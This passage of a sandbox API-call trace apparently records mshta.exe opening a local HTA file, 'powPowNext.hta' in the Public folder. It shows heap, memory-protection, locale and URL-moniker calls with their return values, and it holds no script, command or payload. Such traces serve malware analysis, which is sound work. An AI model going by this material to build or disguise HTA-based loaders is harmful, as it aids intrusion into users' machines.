(CriticalSection=0x8c2758) returned 1 [0131.394] malloc (_Size=0xa8) returned 0xbf9198 [0131.394] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x602c70 [0131.394] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0131.394] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0131.395] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0131.395] malloc (_Size=0xb0) returned 0xbf9248 [0131.395] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x100) returned 0x604878 [0131.395] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x800) returned 0x609148 [0131.395] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0131.396] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x4, lpflOldProtect=0x6e793704 | out: lpflOldProtect=0x6e793704*=0x2) returned 1 [0131.396] GetProcAddress (hModule=0x76f60000, lpProcName=0x1d) returned 0x76f76ff0 [0131.397] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x2, lpflOldProtect=0x19fc44 | out: lpflOldProtect=0x19fc44*=0x4) returned 1 [0131.397] IsCharSpaceW (wch=0x48) returned 0 [0131.397] IsCharAlphaNumericW (ch=0x5c) returned 0 [0131.398] IsCharSpaceW (wch=0x5c) returned 0 [0131.398] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0131.398] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0131.398] IsCharSpaceW (wch=0x41) returned 0 [0131.398] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x5f63a8 [0131.399] IsCharAlphaNumericW (ch=0x20) returned 0 [0131.399] IsCharSpaceW (wch=0x20) returned 1 [0131.399] IsCharSpaceW (wch=0x7b) returned 0 [0131.416] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x1c) returned 0x6029c8 [0131.416] IsCharSpaceW (wch=0x20) returned 1 [0131.416] IsCharAlphaNumericW (ch=0x7b) returned 0 [0131.416] IsCharSpaceW (wch=0x62) returned 0 [0131.416] IsCharAlphaNumericW (ch=0x3a) returned 0 [0131.416] IsCharSpaceW (wch=0x3a) returned 0 [0131.417] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0131.417] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0131.417] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0131.418] IsCharAlphaNumericW (ch=0x3a) returned 0 [0131.418] IsCharSpaceW (wch=0x75) returned 0 [0131.418] IsCharAlphaNumericW (ch=0x28) returned 0 [0131.418] IsCharSpaceW (wch=0x28) returned 0 [0131.418] IsCharAlphaNumericW (ch=0x28) returned 0 [0131.418] IsCharSpaceW (wch=0x23) returned 0 [0131.423] IsCharSpaceW (wch=0x23) returned 0 [0131.423] IsCharSpaceW (wch=0x7d) returned 0 [0131.424] IsCharAlphaNumericW (ch=0x7d) returned 0 [0131.424] IsCharSpaceW (wch=0x29) returned 0 [0131.424] IsCharSpaceW (wch=0x75) returned 0 [0131.424] IsCharSpaceW (wch=0x75) returned 0 [0131.424] IsCharSpaceW (wch=0x29) returned 0 [0131.424] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x34) returned 0x5f28a0 [0131.424] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0131.424] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x2) returned 0x604ba8 [0131.425] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0131.425] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0131.425] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x5f6408 [0131.425] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0131.425] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0131.425] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0131.426] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x4, lpflOldProtect=0x6e793704 | out: lpflOldProtect=0x6e793704*=0x2) returned 1 [0131.426] GetProcAddress (hModule=0x76da0000, lpProcName="CoTaskMemFree") returned 0x76df9170 [0131.426] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x2, lpflOldProtect=0x19fc9c | out: lpflOldProtect=0x19fc9c*=0x4) returned 1 [0131.427] CoTaskMemFree (pv=0x604800) [0131.427] CoTaskMemFree (pv=0x5f61e0) [0131.427] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0131.427] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x4, lpflOldProtect=0x6e793704 | out: lpflOldProtect=0x6e793704*=0x2) returned 1 [0131.428] GetProcAddress (hModule=0x743f0000, lpProcName=0x6) returned 0x74409d40 [0131.428] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x2, lpflOldProtect=0x19fcdc | out: lpflOldProtect=0x19fcdc*=0x4) returned 1 [0131.429] wcsncmp (_String1="HKCU\\", _String2="HKCU\\", _MaxCount=0x5) returned 0 [0131.429] StrCmpCW (pszStr1="Software\\Microsoft\\Internet Explorer", pszStr2="Software\\Microsoft\\Windows Mail\\Trident") returned -14 [0131.429] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0131.430] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x4a) returned 0x604980 [0131.430] GetSysColor (nIndex=26) returned 0xcc6600 [0131.430] GetSysColor (nIndex=5) returned 0xffffff [0131.430] GetSysColor (nIndex=8) returned 0x0 [0131.430] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0131.430] GetSysColor (nIndex=26) returned 0xcc6600 [0131.430] GetSysColor (nIndex=5) returned 0xffffff [0131.430] GetSysColor (nIndex=8) returned 0x0 [0131.456] wcstol (in: _String="0,0,255", _EndPtr=0x19d9c4, _Radix=10 | out: _EndPtr=0x19d9c4*=",0,255") returned 0 [0131.456] wcstol (in: _String="0,255", _EndPtr=0x19d9c4, _Radix=10 | out: _EndPtr=0x19d9c4*=",255") returned 0 [0131.456] wcstol (in: _String="255", _EndPtr=0x19d9c4, _Radix=10 | out: _EndPtr=0x19d9c4*="") returned 255 [0131.456] wcstol (in: _String="128,0,128", _EndPtr=0x19d9c4, _Radix=10 | out: _EndPtr=0x19d9c4*=",0,128") returned 128 [0131.457] wcstol (in: _String="0,128", _EndPtr=0x19d9c4, _Radix=10 | out: _EndPtr=0x19d9c4*=",128") returned 0 [0131.457] wcstol (in: _String="128", _EndPtr=0x19d9c4, _Radix=10 | out: _EndPtr=0x19d9c4*="") returned 128 [0131.462] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0131.463] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0131.463] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x3a) returned 0x5ee728 [0131.464] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x9a) returned 0x6057c8 [0131.465] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0131.465] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x26) returned 0x5f25e0 [0131.465] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x9e) returned 0x605528 [0131.466] GetProcessHeap () returned 0x5e0000 [0131.466] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f2ae0 | out: hHeap=0x5e0000) returned 1 [0131.466] GetProcessHeap () returned 0x5e0000 [0131.466] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f2ee0 | out: hHeap=0x5e0000) returned 1 [0131.466] GetProcessHeap () returned 0x5e0000 [0131.466] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x604ad8 | out: hHeap=0x5e0000) returned 1 [0131.470] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0131.470] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0131.470] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0131.470] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0131.470] _ltow_s (in: _Value=3, _Buffer=0x19dac8, _BufferCount=0x21, _Radix=10 | out: _Buffer="3") returned 0x0 [0131.471] _ltow_s (in: _Value=3, _Buffer=0x19dac8, _BufferCount=0x21, _Radix=10 | out: _Buffer="3") returned 0x0 [0131.471] _ltow_s (in: _Value=3, _Buffer=0x19dac8, _BufferCount=0x21, _Radix=10 | out: _Buffer="3") returned 0x0 [0131.471] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0131.471] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x24) returned 0x5f24c0 [0131.472] _ltow_s (in: _Value=3, _Buffer=0x19dac8, _BufferCount=0x21, _Radix=10 | out: _Buffer="3") returned 0x0 [0131.472] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x1c) returned 0x602b30 [0131.472] _ltow_s (in: _Value=3, _Buffer=0x19dac8, _BufferCount=0x21, _Radix=10 | out: _Buffer="3") returned 0x0 [0131.472] _ltow_s (in: _Value=3, _Buffer=0x19dac8, _BufferCount=0x21, _Radix=10 | out: _Buffer="3") returned 0x0 [0131.472] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x5f6420 [0131.472] _ltow_s (in: _Value=3, _Buffer=0x19dac8, _BufferCount=0x21, _Radix=10 | out: _Buffer="3") returned 0x0 [0131.473] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x16) returned 0x5fcde8 [0131.473] GetAcceptLanguagesW () returned 0x0 [0131.474] LocaleNameToLCID (lpName="en-US", dwFlags=0x8000000) returned 0x409 [0131.474] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x5ea320 [0131.474] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xb0) returned 0x609950 [0131.474] LCIDToLocaleName (in: Locale=0x409, lpName=0x609954, cchName=85, dwFlags=0x8000000 | out: lpName="en-US") returned 6 [0131.474] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x5ea320, Size=0xb0) returned 0x609a08 [0131.474] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x609950 | out: hHeap=0x5e0000) returned 1 [0131.474] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0131.474] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x5ea320 [0131.474] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0131.474] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0131.474] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0131.475] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x609a08 | out: hHeap=0x5e0000) returned 1 [0131.475] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0131.475] memcpy_s (in: _Destination=0x19eda8, _DestinationSize=0x1000, _Source=0x6e896354, _SourceSize=0xc | out: _Destination=0x19eda8) returned 0x0 [0131.475] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x5ea338 [0131.475] GetClassNameW (in: hWnd=0x70258, lpClassName=0x19fd9c, nMaxCount=10 | out: lpClassName="HTML Appl") returned 9 [0131.475] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="HTML Appl", cchCount1=9, lpString2="HH Parent", cchCount2=9) returned 3 [0131.475] GetParent (hWnd=0x70258) returned 0x4031a [0131.475] GetClassNameW (in: hWnd=0x4031a, lpClassName=0x19fd9c, nMaxCount=10 | out: lpClassName="HTML Appl") returned 9 [0131.476] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="HTML Appl", cchCount1=9, lpString2="HH Parent", cchCount2=9) returned 3 [0131.476] GetParent (hWnd=0x4031a) returned 0x0 [0131.476] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0131.476] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0131.477] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0131.477] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0131.477] memcpy_s (in: _Destination=0xd0e350, _DestinationSize=0x6, _Source=0x6d6fe0a0, _SourceSize=0x4 | out: _Destination=0xd0e350) returned 0x0 [0131.477] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0131.477] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0131.477] memcpy_s (in: _Destination=0xd0e370, _DestinationSize=0xc, _Source=0x6d6fe094, _SourceSize=0xa | out: _Destination=0xd0e370) returned 0x0 [0131.477] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0131.477] memcpy_s (in: _Destination=0xd0e390, _DestinationSize=0xa, _Source=0x6d6fe088, _SourceSize=0x8 | out: _Destination=0xd0e390) returned 0x0 [0131.477] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0131.477] memcpy_s (in: _Destination=0xd0e3b0, _DestinationSize=0xc, _Source=0x6d6fe07c, _SourceSize=0xa | out: _Destination=0xd0e3b0) returned 0x0 [0131.477] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0131.477] memcpy_s (in: _Destination=0xd0e3d0, _DestinationSize=0x6, _Source=0x6d6fe074, _SourceSize=0x4 | out: _Destination=0xd0e3d0) returned 0x0 [0131.478] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0131.478] memcpy_s (in: _Destination=0xd0e3f0, _DestinationSize=0x8, _Source=0x6d6fe06c, _SourceSize=0x6 | out: _Destination=0xd0e3f0) returned 0x0 [0131.478] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0131.478] memcpy_s (in: _Destination=0xd0e410, _DestinationSize=0x6, _Source=0x6d6fe064, _SourceSize=0x4 | out: _Destination=0xd0e410) returned 0x0 [0131.481] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0131.481] memcpy_s (in: _Destination=0xd0e430, _DestinationSize=0x8, _Source=0x6d6fe05c, _SourceSize=0x6 | out: _Destination=0xd0e430) returned 0x0 [0131.481] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0131.481] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x1c) returned 0x602bf8 [0131.481] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x1c) returned 0x602ab8 [0131.481] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x1a) returned 0x602d38 [0131.481] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x1a) returned 0x602a68 [0131.481] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x1a) returned 0x602b58 [0131.482] _ltow_s (in: _Value=0, _Buffer=0x19fa50, _BufferCount=0x21, _Radix=10 | out: _Buffer="0") returned 0x0 [0131.482] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x12) returned 0x5fce08 [0131.482] _ltow_s (in: _Value=5, _Buffer=0x19fa50, _BufferCount=0x21, _Radix=10 | out: _Buffer="5") returned 0x0 [0131.482] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x12) returned 0x5fce28 [0131.482] _ltow_s (in: _Value=7, _Buffer=0x19fa50, _BufferCount=0x21, _Radix=10 | out: _Buffer="7") returned 0x0 [0131.482] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x12) returned 0x5fd108 [0131.482] _ltow_s (in: _Value=8, _Buffer=0x19fa50, _BufferCount=0x21, _Radix=10 | out: _Buffer="8") returned 0x0 [0131.482] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x12) returned 0x5fcf68 [0131.482] _ltow_s (in: _Value=9, _Buffer=0x19fa50, _BufferCount=0x21, _Radix=10 | out: _Buffer="9") returned 0x0 [0131.482] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x12) returned 0x5fcf28 [0131.482] _ltow_s (in: _Value=10, _Buffer=0x19fa50, _BufferCount=0x21, _Radix=10 | out: _Buffer="10") returned 0x0 [0131.482] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x14) returned 0x5fce68 [0131.482] _ltow_s (in: _Value=11, _Buffer=0x19fa50, _BufferCount=0x21, _Radix=10 | out: _Buffer="11") returned 0x0 [0131.482] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x14) returned 0x5fcfe8 [0131.482] _ltow_s (in: _Value=12, _Buffer=0x19fa50, _BufferCount=0x21, _Radix=10 | out: _Buffer="12") returned 0x0 [0131.482] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x14) returned 0x5fd188 [0131.482] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0131.483] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x12) returned 0x5fd088 [0131.483] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0131.483] memcpy_s (in: _Destination=0xd0e450, _DestinationSize=0x6, _Source=0x604b28, _SourceSize=0x4 | out: _Destination=0xd0e450) returned 0x0 [0131.483] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x609b78 [0131.484] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0131.484] memcpy_s (in: _Destination=0xd0e470, _DestinationSize=0x8, _Source=0x604b18, _SourceSize=0x6 | out: _Destination=0xd0e470) returned 0x0 [0131.484] GetProcessHeap () returned 0x5e0000 [0131.484] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x604b28 | out: hHeap=0x5e0000) returned 1 [0131.484] GetProcessHeap () returned 0x5e0000 [0131.484] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x604b18 | out: hHeap=0x5e0000) returned 1 [0131.484] GetProcessHeap () returned 0x5e0000 [0131.484] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x604bf8 | out: hHeap=0x5e0000) returned 1 [0131.484] IMoniker:GetDisplayName (in: This=0x5f2fa0, pbc=0x0, pmkToLeft=0x0, ppszDisplayName=0x19fd5c | out: ppszDisplayName=0x19fd5c*="file:///C:/Users/Public/powPowNext.hta") returned 0x0 [0131.484] IUnknown:QueryInterface (in: This=0x5f2fa0, riid=0x6d74ffc4*(Data1=0xa158a630, Data2=0xed6f, Data3=0x45fb, Data4=([0]=0xb9, [1]=0x87, [2]=0xf6, [3]=0x86, [4]=0x76, [5]=0xf5, [6]=0x77, [7]=0x52)), ppvObject=0x19fd30 | out: ppvObject=0x19fd30*=0x5f2fac) returned 0x0 [0131.485] IUriContainer:GetIUri (in: This=0x5f2fac, ppIUri=0x19fd60 | out: ppIUri=0x19fd60*=0x5f5f5c) returned 0x0 [0131.485] IUnknown:Release (This=0x5f2fac) returned 0x1 [0131.485] IUnknown:AddRef (This=0x5f2fa0) returned 0x2 [0131.485] IUnknown:AddRef (This=0x5f5f5c) returned 0x6 [0131.486] IMoniker:GetDisplayName (in: This=0x5f2fa0, pbc=0x0, pmkToLeft=0x0, ppszDisplayName=0x19fd14 | out: ppszDisplayName=0x19fd14*="file:///C:/Users/Public/powPowNext.hta") returned 0x0 [0131.486] UrlGetLocationW (psz1="file:///C:/Users/Public/powPowNext.hta") returned 0x0 [0131.486] UrlGetLocationW (psz1=0x0) returned 0x0 [0131.486] CreateURLMonikerEx (in: pMkCtx=0x0, szURL="file:///C:/Users/Public/powPowNext.hta", ppmk=0x19fbf8*=0x0, dwFlags=0x1 | out: ppmk=0x19fbf8*=0x5f29e0) returned 0x0 [0131.487] CreateUri (in: pwzURI="file:///C:/Users/Public/powPowNext.hta", dwFlags=0x3002b84, dwReserved=0x0, ppURI=0x19fbe4 | out: ppURI=0x19fbe4*=0x609dbc) returned 0x0 [0131.487] IUri:GetScheme (in: This=0x609dbc, pdwScheme=0x19fb7c | out: pdwScheme=0x19fb7c*=0x9) returned 0x0 [0131.487] CoInternetIsFeatureEnabled (FeatureEntry=0x1, dwFlags=0x2) returned 0x1 [0131.487] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0131.488] IUnknown:AddRef (This=0x609dbc) returned 0x6 [0131.488] IUri:GetAbsoluteUri (in: This=0x609dbc, pbstrAbsoluteUri=0xcf8240 | out: pbstrAbsoluteUri=0xcf8240*="file:///C:/Users/Public/powPowNext.hta") returned 0x0 [0131.489] IUnknown:Release (This=0x609dbc) returned 0x5 [0131.489] IUnknown:AddRef (This=0x5f29e0) returned 0x2 [0131.489] IUnknown:Release (This=0x5f29e0) returned 0x1 [0131.489] IUnknown:AddRef (This=0x5f2fa0) returned 0x3 [0131.489] IUnknown:Release (This=0x5f29e0) returned 0x0 [0131.489] CoInternetIsFeatureEnabled (FeatureEntry=0x15, dwFlags=0x2) returned 0x1 [0131.490] IUnknown:AddRef (This=0x5f2fa0) returned 0x4 [0131.490] IUnknown:QueryInterface (in: This=0x5f5f5c, riid=0x6d73333c*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x19f82c | out: ppvObject=0x19f82c*=0x5f5f5c) returned 0x0 [0131.490] IUnknown:Release (This=0x5f5f5c) returned 0x6 [0131.490] IUnknown:AddRef (This=0x5f5f5c) returned 0x7 [0131.490] IUnknown:QueryInterface (in: This=0x5f2fa0, riid=0x6d74ffc4*(Data1=0xa158a630, Data2=0xed6f, Data3=0x45fb, Data4=([0]=0xb9, [1]=0x87, [2]=0xf6, [3]=0x86, [4]=0x76, [5]=0xf5, [6]=0x77, [7]=0x52)), ppvObject=0x19f7f8 | out: ppvObject=0x19f7f8*=0x5f2fac) returned 0x0 [0131.490] IUriContainer:GetIUri (in: This=0x5f2fac, ppIUri=0x19fa90 | out: ppIUri=0x19fa90*=0x5f5f5c) returned 0x0 [0131.490] IUnknown:Release (This=0x5f2fac) returned 0x4 [0131.491] IUnknown:AddRef (This=0x5f2fa0) returned 0x5 [0131.491] IUnknown:Release (This=0x5f2fa0) returned 0x4 [0131.491] IUnknown:AddRef (This=0x5f5f5c) returned 0x9 [0131.491] IUnknown:QueryInterface (in: This=0x5f5f5c, riid=0x6d73333c*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x19f82c | out: ppvObject=0x19f82c*=0x5f5f5c) returned 0x0 [0131.491] IUnknown:Release (This=0x5f5f5c) returned 0x9 [0131.491] IUnknown:AddRef (This=0x5f5f5c) returned 0xa [0131.491] IUri:GetScheme (in: This=0x5f5f5c, pdwScheme=0x19f834 | out: pdwScheme=0x19f834*=0x9) returned 0x0 [0131.491] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0131.517] GetCurrentProcessId () returned 0xe14 [0131.517] GetCurrentProcessId () returned 0xe14 [0131.517] IUnknown:QueryInterface (in: This=0x5f5f5c, riid=0x6d73333c*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x19f82c | out: ppvObject=0x19f82c*=0x5f5f5c) returned 0x0 [0131.518] IUnknown:Release (This=0x5f5f5c) returned 0xa [0131.518] IUnknown:AddRef (This=0x5f5f5c) returned 0xb [0131.518] IUri:GetScheme (in: This=0x5f5f5c, pdwScheme=0x19f808 | out: pdwScheme=0x19f808*=0x9) returned 0x0 [0131.518] IUnknown:QueryInterface (in: This=0x5f5f5c, riid=0x6d73333c*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x19f7ac | out: ppvObject=0x19f7ac*=0x5f5f5c) returned 0x0 [0131.518] IUnknown:Release (This=0x5f5f5c) returned 0xb [0131.518] IUnknown:AddRef (This=0x5f5f5c) returned 0xc [0131.518] IUnknown:Release (This=0x5f5f5c) returned 0xb [0131.518] IUri:GetAbsoluteUri (in: This=0x5f5f5c, pbstrAbsoluteUri=0x19f82c | out: pbstrAbsoluteUri=0x19f82c*="file:///C:/Users/Public/powPowNext.hta") returned 0x0 [0131.519] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x4, lpflOldProtect=0x6e793704 | out: lpflOldProtect=0x6e793704*=0x2) returned 1 [0131.519] GetProcAddress (hModule=0x743f0000, lpProcName=0x7) returned 0x74402640 [0131.519] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x2, lpflOldProtect=0x19f748 | out: lpflOldProtect=0x19f748*=0x4) returned 1 [0131.520] SysStringLen (param_1="file:///C:/Users/Public/powPowNext.hta") returned 0x26 [0131.520] CreateUri (in: pwzURI="file:///C:/Users/Public/powPowNext.hta", dwFlags=0x3002b80, dwReserved=0x0, ppURI=0x19fa7c | out: ppURI=0x19fa7c*=0x60a0f4) returned 0x0 [0131.520] IUnknown:Release (This=0x5f5f5c) returned 0xa [0131.520] IUri:GetScheme (in: This=0x60a0f4, pdwScheme=0x19f7e4 | out: pdwScheme=0x19f7e4*=0x9) returned 0x0 [0131.520] IUri:IsEqual (in: This=0x609dbc, pUri=0x60a0f4, pfEqual=0x19f834 | out: pfEqual=0x19f834*=1) returned 0x0 [0131.520] IUnknown:AddRef (This=0x609dbc) returned 0x4 [0131.520] IUri:GetPropertyDWORD (in: This=0x609dbc, uriProp=0x11, pdwProperty=0x19f5a4, dwFlags=0x0 | out: pdwProperty=0x19f5a4*=0x9) returned 0x0 [0131.520] IUnknown:Release (This=0x609dbc) returned 0x3 [0131.520] IUnknown:AddRef (This=0x5f0b00) returned 0x2 [0131.521] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x52) returned 0x60a278 [0131.521] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x4, lpflOldProtect=0x6e793704 | out: lpflOldProtect=0x6e793704*=0x2) returned 1 [0131.521] GetProcAddress (hModule=0x703b0000, lpProcName=0x207) returned 0x7040a3a0 [0131.521] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x2, lpflOldProtect=0x19d51c | out: lpflOldProtect=0x19d51c*=0x4) returned 1 [0131.522] IUnknown:QueryInterface (in: This=0x6e8967bc, riid=0x703b4c58*(Data1=0xc90db44a, Data2=0x1902, Data3=0x451e, Data4=([0]=0xbd, [1]=0xf0, [2]=0x5c, [3]=0x89, [4]=0x66, [5]=0xb, [6]=0x52, [7]=0x8c)), ppvObject=0x19d510 | out: ppvObject=0x19d510*=0x0) returned 0x80004002 [0131.522] IInternetSecurityManager:GetSecurityId (in: This=0x6e8967bc, pwszUrl="file:///C:/Users/Public/powPowNext.hta", pbSecurityId=0x19f630, pcbSecurityId=0x19f62c*=0x200, dwReserved=0x0 | out: pbSecurityId=0x19f630*=0x0, pcbSecurityId=0x19f62c*=0x200) returned 0x800c0011 [0131.534] IUnknown:Release (This=0x5f0b00) returned 0x1 [0131.534] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60a278 | out: hHeap=0x5e0000) returned 1 [0131.534] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f6090 | out: hHeap=0x5e0000) returned 1 [0131.535] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x609b90 [0131.535] memcpy_s (in: _Destination=0x609b90, _DestinationSize=0xa, _Source=0x19f630, _SourceSize=0xa | out: _Destination=0x609b90) returned 0x0 [0131.535] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f6348 | out: hHeap=0x5e0000) returned 1 [0131.535] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x609ad0 [0131.535] memcpy_s (in: _Destination=0x609ad0, _DestinationSize=0xa, _Source=0x19f630, _SourceSize=0xa | out: _Destination=0x609ad0) returned 0x0 [0131.553] ParseURLW (in: pcszURL="file:///C:/Users/Public/powPowNext.hta", ppu=0x19f7e8 | out: ppu=0x19f7e8) returned 0x0 [0131.553] GetDC (hWnd=0x0) returned 0xb010541 [0131.554] CreateCompatibleBitmap (hdc=0xb010541, cx=1, cy=1) returned 0xf050a62 [0131.554] GetDIBits (in: hdc=0xb010541, hbm=0xf050a62, start=0x0, cLines=0x1, lpvBits=0x0, lpbmi=0x19f3b8, usage=0x0 | out: lpvBits=0x0, lpbmi=0x19f3b8) returned 1 [0131.554] GetDIBits (in: hdc=0xb010541, hbm=0xf050a62, start=0x0, cLines=0x1, lpvBits=0x0, lpbmi=0x19f3b8, usage=0x0 | out: lpvBits=0x0, 